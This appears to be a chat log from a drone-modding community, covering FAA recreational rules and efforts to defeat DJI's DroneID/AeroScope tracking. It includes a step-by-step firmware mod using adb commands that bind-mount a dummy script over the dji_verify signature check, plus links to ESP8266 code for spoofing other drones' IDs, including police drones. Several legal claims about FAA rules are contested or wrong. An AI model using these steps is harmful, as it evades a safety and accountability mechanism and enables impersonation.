[2019-10-09 04:12:56] brett.e.burkhart : The FAA is treating the “Exception for limited recreational operations of unmanned aircraft (49 U.S.C. 44809)” as a “waiver” from the 107 requirements. This is the actual waiver document from the FAA <https://www.faa.gov/uas/recreational_fliers/new_changes_recreational_uas/media/44809_authorization.pdf> It says in part: 1. A copy of the application made for this certificate shall be attached and become a part hereof. 2. This certificate shall be presented for inspection upon the request of any authorized representative of the Federal Aviation Administration, or of any State or municipal official charged with the duty of enforcing local laws or regulations. 3. The holder of this certificate shall be responsible for the strict observance of the terms and provisions contained herein. 4. This certificate is nontransferable. To fly under the Exception for limited recreational operations of unmanned aircraft (49 U.S.C. 44809) you must adhere to the provisions of this document or you cease to be considered operating under the “exception for limited recreational operations of unmanned aircraft” and therefore must have a Remote Pilot Certificate (aka part 107 license) It’s a bunch government bullshit that’s what it is. You must have your registration with you at all times in paper or electronic form and produce it for LE when asked.

[2019-10-09 09:37:42] cantrepeat : There was already one case tossed out of court over this recreational use.

[2019-10-09 09:40:47] cantrepeat : Section 336 applies to recreational use of drones over 55 pounds, meaning tiny toys are not affected. For those operating heavier drones for fun, pilots will need to pass an aeronautical exam and safety test administered by the FAA. However, as Brice notes, the rule was passed last fall and the test has not been made public yet.

[2019-10-09 09:41:44] cantrepeat : updated 2019 article about drone laws <http://www.abajournal.com/news/article/want-to-fly-a-drone-you-have-to-play-by-the-rules>

[2019-10-09 09:42:52] cantrepeat : <https://jrupprechtlaw.com/drone-laws/>

[2019-10-09 09:43:04] cantrepeat : Some of the stuff was even rolled back

[2019-10-09 09:47:53] cantrepeat : That waiver is not needed to fly as a hobbyist either.

[2019-10-09 09:50:53] cantrepeat : That is a waiver for recreational flying in a controlled air space.

[2019-10-09 09:53:18] cantrepeat : <https://www.faa.gov/uas/commercial_operators/part_107_waivers/waivers_issued/media/2016-ATO-P107-00219_signed.pdf>

[2019-10-09 10:36:34] dkovar : Valid and interesting question.

[2019-10-09 10:41:41] dkovar : Very valid question.

[2019-10-09 11:02:52] cantrepeat : You must fly in Class G airspace. If you need to fly in Class B, C, D or E controlled airspace, you need to apply for airspace authorization. Check out our LAANC authorization guide to better understand how that authorization process works.

[2019-10-09 13:46:26] the_lord : I don't see anything related to AeroScope on their site

[2019-10-09 14:14:49] the_lord : yes, just tested it on both 2.3/2.5

[2019-10-09 15:14:58] bobdole : from that drone law page "For example, I was reading a drone book, by someone very popular on the internet and Youtube, which was just completely – flat out – totally- 100% wrong. The section on drone laws was just horrible. I think this person just hired a copywriter to write the book which resulted in utter garbage. If you were to rely on that bad advice, you could get in trouble and be on the receiving end of a lawsuit or criminal prosecution. Worse yet, on their Youtube channel, they continued to give out legal advice that was incomplete. " I bet he's talking about tony northrup

[2019-10-09 15:15:05] bobdole : that guy is full of erroneous information

[2019-10-09 15:20:09] cantrepeat : I was thinking of that other internet/youtube guy that thinks he's the end all be all of drone regs and shit.

[2019-10-09 15:21:24] cantrepeat : the Ken Heron idiot

[2019-10-09 15:25:13] cantrepeat : If so, regardless, you don't need a waiver to fly as a hobbyest in non regulated air space.

[2019-10-09 15:31:11] brett.e.burkhart : You already have one per the link above. That’s the “authorization” to fly for pilots that meet the criteria. This is in lieu of an Airman Certificate which is what is normally required to fly in the National Airspace.

[2019-10-09 15:33:13] cantrepeat : At fixed sites (commonly referred to as flying fields)

[2019-10-09 15:33:47] cantrepeat : I can't wait until there are personal sales background checks for toys.

[2019-10-09 15:37:35] brett.e.burkhart : That’s one of the ways rec pilots can fly in controlled airspace without a LAANC Authorization or COA since it’s listed in that waiver. An example of a “fixed site” is an AMA field which has registered and been approved to be a “fixed site” with the FAA. Even though an AMA field might be in controlled airspace pilots there do not each need their own COA because of this specific provision

[2019-10-09 15:41:01] cantrepeat : All this in the name of anti terrorism, last I check it wasn't a mavic that was flown into the world trade center towers.

[2019-10-09 15:50:15] brett.e.burkhart : Again I’m not disagreeing with your overall sentiment, I actually totally agree it’s ridiculous. I just wanted to set the record straight so we don’t get anybody in trouble for refusing to provide documents they are required to provide. I’m down for working on getting droneID disabled but we really need a way to be able to test it. We know the remote doesn’t have GPS so does it just use the home point for the operators location or does it use the device’s GPS location? What happens if the home point is updated or the devices GPS location is faked? I know it can also triangulate the RF signal back to the operator but I don’t know that we can stop that.

[2019-10-09 15:52:59] the_lord : if they are using RF detectors other than AeroScope, there is no way to escape

[2019-10-09 15:54:27] cantrepeat : I still don't believe that you need a waiver to fly in non regulated air space. As I see it, register the drone, don't fly in regulated air space, don't go above 400 and maintain LOS and you meet the requirements by low.

[2019-10-09 15:55:02] cantrepeat : I'm not going to request a waiver to fly around in my backyard 12 miles from a small airport.

[2019-10-09 15:55:32] cantrepeat : and give right away to any manned aircraft at any location.

[2019-10-09 15:55:36] cantrepeat : end of line

[2019-10-09 16:34:53] brett.e.burkhart : You don’t need a new waiver. You already have it. The FAA has granted that wavier to all pilots meeting the conditions specified in the waiver. You don’t have to do anything more as long as you follow the rules of that waiver which you have already been granted. I pulled that up so you could see that having the registration handy and making it available to LE upon request is a requirement to fly under the “Exception for limited recreational operations of unmanned aircraft (49 U.S.C 44809)” otherwise you need an Airman Certificate which also has a requirement to be provided to LE upon request. They got ya coming and going. My point was you can’t refuse to give your registration to LE just because they don’t have reasonable suspicion which btw is already a pretty low bar

[2019-10-09 16:53:28] brett.e.burkhart : @catalinaskirace he’s a better resource for those recreational requirements. Same info but more explicit on what it is and easier to read <https://www.faa.gov/documentLibrary/media/Advisory_Circular/AC_91-57B.pdf>

[2019-10-09 17:02:53] quad808 : Thanks guys, now I am totally confuded...

[2019-10-09 17:06:49] quad808 : So....you are in the US, flying a drone. Local LE comes up to you and starts asking you questions about who you are, what you are doing etc. Do you: 1. exercise your 5th ammendment rights and don't give them anything 2. refuse to answer any questions unless they tell you why you are being questioned, and if you broke any laws, since they are not FAA 3. show them whatever you guys talked about above, which they will not understand anyway 4. beg for forgiveness 5. sell all your drone stuff and get out of town

[2019-10-09 17:07:31] bobdole : land the drone onto yourself and the cop (at 15mph descent) and then sue the city

[2019-10-09 17:07:43] bobdole : PROFIT

[2019-10-09 17:07:53] quad808 : OMG...I just spit up....HAHAHAHAHHA

[2019-10-09 17:08:28] quad808 : Thats what I get for eating and typing....bwahahahahaha

[2019-10-09 17:09:24] quad808 : Hey....I watch "Cops" and know what idiots reveal to cops when they are fishing.... I D I O T S

[2019-10-09 17:09:26] bobdole : i got approached by jehovas witnesses once while piloting a mavic air and oh man i was shocked at how much of a dangerous distraction that was. you can't have a half pound thing hundreds of feet in the air with exposed spinning blades just left to do whatever it wants

[2019-10-09 17:10:49] bobdole : the cop will essentially have to ask you to land the drone or wait until you land it. when he goes that far, he's gotta fabricate a reason to do so and that is what makes me uncomfortable.

[2019-10-09 17:11:49] quad808 : totally agree....I am a reasonable guy and have LE in the family, but do realize that there is a lot of attitude in LE by many

[2019-10-09 18:06:34] cantrepeat : I read that PDF, if you are flying in class G non regulated air space then you just need to follow the stuff I said, LOS, 400' AGL, give way to manned aircraft. You don't need to ask for authorization or get a waiver to fly.

[2019-10-09 18:07:57] cantrepeat : I'm going to print that PDF and take it with me when I fly. That way, if a LEO ask for stuff I can just high light the class G and pull up flightaware and show it's non regulated air space and tell them to piss off.

[2019-10-09 18:24:13] cantrepeat : well damn, it looks like there will be a required knowledge and safety test coming out. Some time with the next six months it says.

[2019-10-09 18:24:57] cantrepeat : So it's going to be like operating a motor vehicle, you don't need to violate a law in order for a LEO to ask for you DL.

[2019-10-09 18:25:16] cantrepeat : <https://www.faa.gov/uas/recreational_fliers/>

[2019-10-09 19:09:27] quad808 : I would like to make my own community based organization. Member: one. Membership closed.

[2019-10-09 19:10:31] quad808 : Wait. Let me change that. Membership open to all with a $1000 registration fee. One time, life membership. (I need to pay for my drones somehow)

[2019-10-09 19:11:42] brett.e.burkhart : That’s what I do!

[2019-10-09 19:17:26] cantrepeat : I dunno, it says something in there about needing to articulate what safety guidelines you are following, if asked by an FAA official.

[2019-10-10 03:52:24] brett.e.burkhart : You are right! Follow the PDF not what I say

[2019-10-10 09:29:43] cantrepeat : It's just asinine how this is getting. You don't have to explain the laws to a traffic cop when you get stopped.

[2019-10-10 12:27:22] nocommie : Maybe not but the screenshots/reports had the name aeroscope in it.

[2019-10-15 21:24:01] coldflake : Aeroscope hack is coming out with NLD V2 to protect our Chinese users from governmental abuse

[2019-10-26 14:52:54] boris.plintovic : <https://github.com/DJISDKUser/ESP8266_DJI_DroneID_Throwie>

[2019-10-26 15:49:16] cantrepeat : I don't know how I feel about this feature - copy and rebroadcast someone else's valid ID?

[2019-10-26 15:50:27] cantrepeat : It's like SWATting someone

[2019-10-26 15:50:32] cantrepeat : or could be

[2019-10-26 16:20:26] boris.plintovic : I was able to upload the program to ESP but I don't know how to set it up

[2019-10-26 19:49:38] bobdole : its going to work like this... guy flies drone like a douchebag where aeroscope is being used and sticks out like a sore thumb. he repeats and they figure out he's using a spoofer. they look for ip addresses that downloaded said spoofer and kick his door 3 hrs later

[2019-10-26 20:41:30] dkovar : ... and kick in the door of the local Starbucks.

[2019-10-27 10:17:49] cantrepeat : There isn't a legal requirement to transmit an ID, yet.

[2019-10-27 10:39:19] dkovar : Or anything illegal about transmitting a false ID that I can think of, though I am sure someone could get creative.

[2019-10-27 10:53:32] cantrepeat : what's the federal code about hacking that pretty much allows them to encompass anything they want?

[2019-10-27 10:54:23] cantrepeat : I don't want to google it, FBI might come to my house!! :smile:

[2019-10-27 13:47:17] bobdole : no requirement, but this makes me think scenarios where someone would want to spoof a droneid (short of trolling at a demonstration which i highly encourage) would most likely involve something illegal and very high profile

[2019-10-27 14:19:18] nocommie : so how about spoofing the dji info from one of the local law enforcement drones? lol

[2019-10-27 15:08:05] bobdole : i like that one

[2019-10-28 01:08:14] mutantroar : @boris.plintovic That throwie "example" is just that...an example of how you "might" broadcast a sample droneID packet. Although it will function "as-is," it is not meant to. It is very stripped down and requires you knowing the format of the drone ID packet as well as a little bit about WiFi packets in general. It just creates a single sample packet of hard coded data (SSID, telemetry, etc) and broadcasts it every second. You'll need to spend some time studying a little packet "anatomy" to really make sense of it or be of any use to you. I would also suggest capturing real packets yourself and analyzing them to get a better understanding of how they occur in the wild. If you do that, the throwie code will be significantly more clear to you.

[2019-10-28 01:14:19] mutantroar : (Line 45 in the throwie is where the meat of the drone id packet is)

[2019-10-28 06:49:01] boris.plintovic : the program also had a small error in line 11 not 128 but 270 after uploading to esp I turned on wifi snifer and displays new wifi ABCDEFG

[2019-11-01 11:08:24] the_lord : AeroScope detected the Mavic mini and reported it as newdrone_53

[2019-11-01 14:00:52] mutantroar : Is 53 the value that is coming through on the product_type field of the DroneID?

[2019-11-02 01:51:02] the_lord : I don't know

[2019-11-03 21:10:19] pingspike : trying to find out when droneid was introduced to the Mavic Pro range, did it get built in to a certain firmware version ? can't find any details on the wiki

[2019-11-03 23:20:10] quad808 : I believe it was 01.03.0800

[2019-11-03 23:20:38] quad808 : which is another reason why 01.03.0700 firmware is so popular.

[2019-11-04 09:22:24] pingspike : thanks @quad808 thankfully I'm still rocking `.700` :+1:

[2019-11-04 17:40:29] kyokushin : Hi there, any eta? Work on defeating droneid is cancelled or still fighting?

[2019-11-13 23:44:02] chipmangini : <https://www.theverge.com/2019/11/13/20963702/dji-drone-remote-identification-smartphone-app?fbclid=IwAR1Vojc0SSv5cYDC_Z-5P9MGEHTmrE2USLCcUFTgOAgvqE5se9UjgX4WZ7A>

[2019-11-14 02:13:02] nocommie : what could possibly go wrong... FFS

[2019-11-14 03:24:56] digdat0 : wonder how long until the first lawsuit in the US against it

[2019-11-14 06:29:23] pingspike : :pensive:

[2019-11-14 07:08:20] ki4gyw : Wonder if NLD will actually release what they have been sitting on to counter this. I see a need for ID but not for everyone to launch a app and gather all the data.

[2019-11-14 07:10:52] ki4gyw : your data is not our business, its everyone's.

[2019-11-14 14:05:49] peteair : hello ! I get back to that ages old message :slightly_smiling_face:. Just out of curiosity : how did you find symbols for those firmware ? Some are clearly seen by doing a "strings" on the bin file (eg. "Rfmodulerr" for 1400.bin firmware) but for others (like "ofdm_init_instruction") how did you do ?

[2019-11-14 14:06:19] peteair : Is it done manually by analyzing the code or did you have another source of information ?

[2019-11-14 15:21:05] peteair : that's really good work thx :+1: ! I'm still curious about how data are sent and received to/from the FPGA. am I right to assume that this will transit throught that uC ? do you know if it would be final decoded/decrypted message (0x55....) or raw demodulated bytes from the FPGA ?

[2019-11-14 17:04:59] peteair : yes I guess they've made Artosyn build a chip based on their VHDL design for the FPGA...

[2019-11-14 17:07:33] peteair : my interrogation was more about the amount of work done by the FPGA: if it's only OFDM modulation we have a chance to reverse it, if it also includes packet framing, encryption etc... we're probably out of luck....because the fpga bitstream is encrypted (and even if it was not, I'm not sure we could reverse the bitstream to RTL and understand what happens)

[2019-11-14 17:38:18] mefisto : Second half of the m1900 fw in P3X is empty (filled with 255), the other half starts with some sparse data, then goes into something random - possibly encrypted, but I didn't tried to dive into Alteras bitstream format deep enough to confirm that. So you confirmed it's some kind of encryption?

[2019-11-14 22:38:17] chipmangini : More info from !DJI <https://www.dji.com/newsroom/news/dji-demonstrates-direct-drone-to-phone-remote-identification?fbclid=IwAR2uD96inJ4X8lh3gVXQEs6TOcoZ6oWbWo39lgMDIt8fta9HszT4xh3Lt1A>

[2019-11-14 22:43:55] quad808 : Wow! How are they going to get their phones so close to a drone flying at 400ft? pffffft!:stuck_out_tongue_closed_eyes:

[2019-11-14 23:40:32] dkovar : Bluetooth can go 400ft, easy.

[2019-11-15 04:11:54] bjoneseying : Fly higher :smile:

[2019-11-15 06:27:44] pingspike : Would this work on “older” hardware / firmware like the Inspire 1 and older Phantoms?

[2019-11-15 12:03:49] dkovar : "Wi-Fi based solution to remotely identify airborne drones" Should just be a firmware update. It's just their existing Aeroscope modified to be received by other devices.

[2019-11-15 14:55:36] pingspike : but this was all designed after the shift from oldskool to modern (for want of a better description) firmware types?

[2019-11-15 16:19:20] peteair : @mefisto: you can check entropy with binwalk and it's around 100% + I've compared to known clear and encrypted bitstream. Moreover, even if the format is proprietary, the header has some distinct features.....so yes I'm pretty certain that their bitstream is encrypted unfortunately

[2019-11-16 20:35:11] boris.plintovic : Maybe FlightController.rb by @jan2642 is the right way. <https://github.com/jan2642/DUMLrub>

[2019-11-17 10:45:13] oakley75 : I assume it's not enough to force encryption on our WiFi transmission (ala P2V+ days) to stop this silly app? Aeroscope a different ball game obviously.

[2019-11-18 11:51:19] eitan1195 : any idea how to receive the lightbridge packets?it appears to be a sort of wimax,but cant seem to recept it using the gnuradio

[2019-11-18 13:09:49] peteair : interesting ! why do you compare them to wimax ?

[2019-11-18 13:10:01] eitan1195 : It is documented in a few places.

[2019-11-18 13:10:18] peteair : just because it's ofdm or because of other features ?

[2019-11-18 13:13:27] eitan1195 : based on documentation of commercial companies.

[2019-11-18 13:56:02] peteair : nice ! would you happen to have some link to share ?

[2019-11-19 17:25:37] zwontzov.da : @pierreduf <https://diydrones.com/m/blogpost?id=705844%3ABlogPost%3A2291366>

[2019-11-20 07:12:01] eitan1195 : the issue is the lack of a proper wimax gnuradio chain, and the wimax intel cards are rubbish

[2019-11-20 17:40:46] zwontzov.da : @eitan1195 and what is about droneid for Aeroscope in Lightbridge? Is it a special burst in common video channel or separate physical channel?

[2019-11-21 02:31:34] nocommie : <https://youtu.be/EdRvaTlKJIA>

[2019-11-21 03:11:50] bobdole : that video never gets old

[2019-11-21 06:19:20] boris.plintovic : A week of work culminating in success. DJI Spark FW 1.00.0900 Applied FC_Patcher (305, 306 modules) applied forceFCC + Boost All I have to do is test flight

[2019-11-21 07:15:00] eitan1195 : No clue.the entire transmission is wimax ,it probably passes as the equivalent to beacons in wimax.we really need a gnuradio chain for that.

[2019-11-21 10:02:16] pingspike : Nice!

[2019-11-28 19:34:10] pingspike : does the new DJI FPV gear broadcast droneid data? :thinking_face:

[2019-11-28 22:14:55] the_lord : I don't think so as there is no GPS coordinates , I can test tomorrow :slightly_smiling_face:

[2019-11-29 09:31:11] pingspike : good point

[2019-11-29 11:24:34] the_lord : as expected AeroScope didn't see the FPV system

[2019-11-30 11:57:31] zwontzov.da : <https://dl.djicdn.com/downloads/Mavic_2_Enterprise/20190917/Mavic_2_Enterprise_Series_Release_Notes_EN.pdf>

[2019-11-30 11:59:01] zwontzov.da : Date: 2019.09.02 Mavic 2 Enterprise Aircraft Firmware: v01.01.0400 AES-256 transmission encryption The encryption was added in September. Does Mavic Pro 2 use Ocusync encryption? I think no. Only Enterprise series uses it.

[2019-11-30 12:01:30] zwontzov.da : @the_lord What do you think about Mavic's encryption? Does Aeroscope receive telemetry from upgraded Mavic 2 Enterprise and Matrice 200 Series?

[2019-12-01 11:51:49] the_lord : all DJI drones will be detected regardless its protocol or encryption

[2019-12-01 15:02:15] zwontzov.da : @the_lord Does Aeroscope update by internet from own application? So we can't download firmware in browser and update complex by USB. <https://forum.dji.com/forum.php?mod=redirect&goto=findpost&ptid=166229&pid=1699146> and then I have the latest version using Assistant2 for Aeroscope: v03.00.0014. The Mavic 2 Enterprise is still detected as NewDrone_51, so this will not solve your problem. If DJI turn on AES encryption they must pass the AES key to Aeroscope. Am I right?

[2019-12-01 15:44:16] jcase : @zwontzov.da where does one find those release note PDFs

[2019-12-01 15:44:23] the_lord : @zwontzov.da no it doesn't update from internet, if you read the post you mentioned, it updates the CS application using downloaded bin file what do you mean by "download firmware in browser and update complex by USB" there is no relation between drone communication protocol and AeroScope, even if the drone is using AES encryption the AeroScope will detect it

[2019-12-01 15:44:47] jcase : DroneID beacons are not AES encrypted

[2019-12-01 15:45:04] jcase : aeroscope can not read the OC stream, jsut teh beacons

[2019-12-01 16:28:24] dkovar : Does anyone have a packet descriptor for a DroneID beacon? Records, field lengths, etc?

[2019-12-01 16:42:51] zwontzov.da : @jcase here <https://dl.djicdn.com/downloads/dji_assistant/20190314/DJI+Assistant+2+For+AeroScope+Release+Notes(V2.0.1).pdf>

[2019-12-01 16:43:07] jcase : right but whre do you get the pdf links from

[2019-12-01 16:43:14] jcase : i'd like to auto pull al lthe pdfs

[2019-12-01 16:43:19] jcase : scrape it

[2019-12-01 16:47:40] zwontzov.da : @jcase I found it after reading forum. I searched in Google. I found the page with links one minute ago :) <https://www.dji.com/downloads/softwares/assistant-dji-2-for-aeroscope>

[2019-12-01 16:47:50] jcase : ah

[2019-12-01 16:47:51] jcase : thanks

[2019-12-01 16:48:01] jcase : yeah im after the PDFs for drone firmware updates

[2019-12-01 16:50:51] zwontzov.da : @jcase It's very strange that DroneID beacones are not encrypted. Yes, I read about it in another sources. So we can theoretically receive telemetry in DroneID, but telemetry in OC stream is encrypted :slightly_smiling_face: Thanks!

[2019-12-01 16:51:17] jcase : i wouldnt expect them to be encrypted

[2019-12-01 16:51:22] jcase : DJI would love for it to be a standard

[2019-12-01 16:51:29] jcase : well when the ydesigned it they did

[2019-12-01 16:56:48] zwontzov.da : Is it test solution for RemoteID? The first design. After that DJI provides standard for RemoteID through WiFi. I think that it is first attempt in universal protocol design.

[2019-12-01 16:58:41] zwontzov.da : And what will OC stream encryption give? Only marketing in this case?

[2019-12-01 17:11:05] jcase : protection from some potential attacks

[2019-12-01 17:13:50] zwontzov.da : I don't think that downlink channel with video can be used for attacks. Uplink from RC, yes.

[2019-12-01 17:36:05] jcase : Sure it can

[2019-12-01 17:36:20] jcase : They could see what drone is interested bij

[2019-12-01 18:49:46] zwontzov.da : Ok, I agree)

[2019-12-01 21:26:12] pingspike : it's a safe bet the Inspire 1 doesn't have clue what drone id is, right?

[2019-12-02 03:17:20] jcase : bet it does

[2019-12-02 05:03:43] the_lord : Inspire 1 has drone ID and AeroScope can see it

[2019-12-02 07:49:12] eitan1195 : it still would require one to read the ocusync channel at the moment right?because the droneid is currently sent(when in rc mode) via ocusync on the mavic pro for instance.

[2019-12-02 09:15:05] pingspike : interesting - I though something that old would be safe

[2019-12-02 09:15:07] pingspike : clearly not :confused:

[2019-12-04 20:05:26] flydji : can mp1 on 1.03.700 be seen by aeroscope?

[2019-12-04 20:48:20] quad808 : I don't believe so....it was "turned on" in .0800 firmware. One more reason why DJI hates you downgrading. Throws a monkey wrench in their world domination plans...

[2019-12-04 22:26:59] boris.plintovic : Last MP fw without Aeroscope is 1.03.0600

[2019-12-04 22:31:14] exumpw : You checked with kismet? If I am not mistaken, 0600 and 0700 801 module and ath6kl_usb.ko both are same md5.

[2019-12-04 22:37:06] exumpw : Checked checksum again only difference is 400, 805, 907 modules.

[2019-12-04 22:53:06] boris.plintovic : yes kismet. then he tried modulemix 0600 and 04.0300 without 801 and it didn't work out well. drone blocked. no rc, no wifi, no usb. dead

[2019-12-05 05:43:55] exumpw : I checked using latest kismet from github on Mavic Pro in WiFi mode after starting motors. 04.0300 - Mavic (Broken firmware) DroneID which seems to be blank frame. <https://github.com/kismetwireless/kismet/blob/d4f62f2d82f788458354a28166399c0b0502c429/phy_uav_drone.cc#L182-L203> 03.0900 - Manufacturer DJI/DroneID Serial Number XXX ID Method DroneID Telemetry Motor 1 Airborne 0 Last Location 0, 0 Home Location 0, undefined Height 0 03.0700, 03.0800 - no DroneID packets captured. Also according to department13 Anatomy-of-DJI-Drone-ID-Implementation ath6kl_usb.ko md5 3d07a732ac90667c618144f46eb3cee4 has flight_info which seems to be starting from 03.0900.

[2019-12-05 06:55:56] boris.plintovic : Broken fw is aeroscope on. If aeroscope is off, kismet write Fingerprint

[2019-12-05 07:01:08] boris.plintovic :

[2019-12-05 07:40:01] boris.plintovic :

[2019-12-05 07:40:41] exumpw : Looking at parser code kismet report Broken firmware if DroneID sub command is 0x00 (9 byte, 0x10 = flightreg, 0x11 = flightpurpose). UAV Fingerprint is compared with mac, ssid from conf/kismet_uav.conf.yaml (although my ssid is ^Mavic-.* not ^Mavic_.*).

[2019-12-05 12:33:43] boris.plintovic : I think if Kismet reports IDmetod: DroneID Aeroscope packet is actively but we can't read it. IDmetod: Fingerprint meaning probably Aeroscope packet is missing and drone is detected only from SSID name

[2019-12-05 14:35:02] exumpw : Sounds right. So on 0700 and 0800 firmware I get no DroneID packets and I get only fingerprint (after fixing ssid match from Mavic_ to Mavic-). Hopefully it is not transmitting DroneID packets over OcuSync as well. <https://i.imgur.com/ZfdMvqH.png>

[2019-12-05 14:58:08] jcase : @exumpw all of the firmwares i obtained transmitted droneid, either on wifi or occusync

[2019-12-05 14:58:32] jcase : I have an early prototype aeroscope, so i can actaully read them properly

[2019-12-05 15:20:58] boris.plintovic : @jcase all of them? Even at 0600? because in a document from Kevin F. it says that 0600 is not.

[2019-12-05 15:31:20] jcase : i havent checked 600 but i suspect it does at occusync but i would need to check

[2019-12-05 16:07:44] boris.plintovic : shame you don't have Spark. I think I managed to turn Aeroscope off. at least the kismet shows

[2019-12-05 16:08:19] validat0r : good work

[2019-12-05 16:59:11] markusfriedl : how?

[2019-12-05 17:43:34] exumpw : So if all Mavic firmwares (including 0700 and older) have droneid over ocusync then only WiFi part droneid was added in 0900 and later (which is at 0801/system/lib/modules/ath6k/ath6kl_usb.ko according to department13). Does it mean only way to disable droneid is reverse and patch firmware? Even esp8266 jammer will only work on WiFi.

[2019-12-05 18:10:24] boris.plintovic : @jcase can I send you my mod for a test then?

[2019-12-05 18:41:38] jcase : No

[2019-12-05 18:41:49] jcase : I don't support disabling droneid

[2019-12-05 18:41:59] jcase : But yeah bits easy on wifi ones

[2019-12-05 20:08:25] kyokushin : @boris.plintovic , great, could you describe how it is achieved? Of course if you like to share it.

[2019-12-05 20:19:08] boris.plintovic : I still need to improve the implementation process. When I'm done, I'll post everything

[2019-12-05 21:27:44] markusfriedl : i have a spark to test if you need some support

[2019-12-06 16:29:36] jcase : @boris.plintovic what wifi chip/adapter are you using

[2019-12-06 16:35:37] boris.plintovic : I think Ralink

[2019-12-06 16:58:38] jcase : and its capable of doign the the short channels?

[2019-12-06 16:59:00] jcase : eg can you only listen, or can you connect to the network

[2019-12-06 17:19:08] jcase : @jacksphone for safety reasons

[2019-12-06 17:19:19] jcase : same reason i dont support removing NFZs in an unofficial way

[2019-12-06 17:19:38] jcase : but i belieave that should fall on the individual user,

[2019-12-06 17:20:14] jcase : it is also a bit of a waste to do it, you can still detect teh drones

[2019-12-06 17:21:13] bobdole : i see. thanks for answering my nosy question

[2019-12-06 17:21:18] jcase : no problem

[2019-12-06 17:47:24] boris.plintovic : it is a standard wifi usb adapter. Chip allows you to switch to monitor mode

[2019-12-06 17:54:35] quad808 : @jcase check your PM about my bees

[2019-12-06 21:31:24] digdat0 : i miss having bees, they are an amazing animal

[2019-12-06 21:59:11] fredmicrowave : Going to check my bees about your PM ...

[2019-12-06 23:13:08] quad808 : Do bees have knees?

[2019-12-07 08:25:39] boris.plintovic : **Spark Anti-Aeroscope Emma mod** Before using this mode, please make sure your Spark has the original fw 1.00.0900 There are 2 files in the Firmwares folder. Use DUMLdore and make flash _Emma1_, restart the drone, flash _Emma2_. You now have Spark fw 1.00.0900 AntiAeroscope. And you need flash custom 305,306 modules (SuperPatcher), you need to use the procedure for P4. • adb shell • cd /vendor/bin • chown root:root dummy_verify.sh • chmod 755 dummy_verify.sh • cp **/system/bin/dji_verify** /vendor/bin/original_dji_verify_copy • sync • cd / and • adb shell mount -o bind /vendor/bin/dummy_verify.sh **/system/bin/dji_verify** <https://drive.google.com/open?id=1QnM_aCJrJzrNPap7C3BfX10cpQDfjeTc>

[2019-12-07 08:37:01] exumpw : Is it 801 module mix 0300 with 0900? Btw Mavic 0700 firmware also use /system/bin/

[2019-12-07 08:38:27] boris.plintovic : yes

[2019-12-07 08:39:04] boris.plintovic : i test and work, but must start with original 1.00.0900

[2019-12-07 08:40:47] boris.plintovic : Don't try (modulemix) on MavicPro. I killed my drone

[2019-12-07 09:00:23] jezzab : What were you module mixing @boris.plintovic on the MP?

[2019-12-07 09:01:10] boris.plintovic : 801 Android system module

[2019-12-07 09:02:26] jezzab : To stop the MP sending AS packets when switched to Wifi?

[2019-12-07 09:09:33] boris.plintovic : downgrade to 03.0600 and upgrade to 04.0300 without 801. MPP dead, no USB, no WiFi, no RC

[2019-12-07 09:10:09] boris.plintovic : On Spark work fine. Test on Kismet

[2019-12-07 09:16:14] jezzab : Why 01.03.0600?

[2019-12-07 09:21:55] boris.plintovic : last fw which does not broadcast droneid

[2019-12-07 09:56:19] exumpw : Where did you get info about 0600? I checked 0700 and 0600 have same modules. 0800 ath6kl_usb.ko also has no flight_info and get no droneid on kismet.

[2019-12-07 10:01:02] kyokushin : Thax, could you tell how ot is done? I would like to combine this patch with anti nfz and superpatcher in my Spark.

[2019-12-07 12:06:09] boris.plintovic : It does not matter. MPP apparently does not support modulemix with module 801. I killed 1 week old MPP, I don't plan to try again

[2019-12-07 12:14:45] exumpw : Just curious if I missed something. Anyway I think 801 module is for WiFi only, so ocusync droneid still be there. I was just under impression droneid was implemented for both ocusync and wifi only after 0900 (or 0800), but according to @jcase even old firmwares have it. Other than that I dont see reason to module mix, if you dont need new firmware features. You can use FC Patcher on old firmwares as well, only need to find right offsets. I managed to adjust patch offsets for 0700.

[2019-12-07 12:16:39] boris.plintovic : Unfortunately we don't have an Aeroscope. It would make our job easier

[2019-12-07 12:21:39] boris.plintovic : Use Emma mod, after download firmware for Spark <https://github.com/brett8883/Super-Firmware_Cache/tree/master/Spark_Super_Patcher_FC> and use SuperPatcher as Phantom4

[2019-12-07 12:59:42] validat0r : so this is a wrapper for superpatcher? what's the added value?

[2019-12-07 18:19:30] boris.plintovic : No, this is a standalone mode for shutting down droneid. SuperPatcher can then be applied but requires a slightly different procedure, as some system files that SuperPatcher calls during installation are located in other folders

[2019-12-07 18:22:58] validat0r : Standalone mode?

[2019-12-07 18:48:17] boris.plintovic : independent :slightly_smiling_face: can be used without any further modification

[2019-12-08 08:57:02] eitan1195 : how do you read the ocusync exactly?

[2019-12-09 15:43:08] kyokushin : Ookay, so how to use it with superpatcher? What system files the mod is changing?

[2019-12-09 19:14:49] bobdole : is there a cheap dev version of aeroscope?

[2019-12-09 20:39:09] dkovar : AeroScope is generally available to LE only.

[2019-12-09 21:00:49] boris.plintovic : After apply Emma mod, dji_verify file is not in sbin folder but system/bin/ folder

[2019-12-09 21:01:12] validat0r : so?

[2019-12-09 21:02:19] boris.plintovic : Must use step by step for P4 no for Spark <https://dji.retroroms.info/howto/manually_installing_custom_fw_from_fc_patcher|https://dji.retroroms.info/howto/manually_installing_custom_fw_from_fc_patcher>

[2019-12-09 21:03:17] exumpw : <https://pastebin.com/m5bD1zyS> Updated esp8266 snippet to modify hardcoded droneid, mac, ssid, channel values. I still think aeroscope might be able easily filter WiFi packets and still detect Ocusync drones. Also possible to detect fake access points (beacon packets) cause there is no data packets or by similar signal strength (RSS).

[2019-12-09 21:04:07] boris.plintovic : Of course in last step flash .bin for Spark

[2019-12-09 21:04:53] exumpw : Only thing I would like to confirm with aeroscope that droneid is still present over ocusync on old firmwares (0700, 0600).

[2019-12-09 21:09:08] validat0r : I get the dji_verify shenanigans ... but you're flashing just some vanilla .0300 modules, nothing more?

[2019-12-09 21:09:31] validat0r : and the modded FC surely has nothing to do with droneid, does it?

[2019-12-10 12:38:25] boris.plintovic : Yes, Emma1 flash 0300 system modules, Emma2 all 0900 without 801. Its easy. But must start on original 0900, from 1000 not work.

[2019-12-10 12:42:24] validat0r : there were some problems running mixed modded spark .. can't remember, what it was .. no showstopper, but some nuisance

[2019-12-10 12:43:27] validat0r : anyway .. i'm running a no-droneid patched spark for months now .. i certainly won't modmix again

[2019-12-10 13:58:32] jcase : @exumpw what deos that snipped do?

[2019-12-10 14:09:50] boris.plintovic : No-droneid patch?

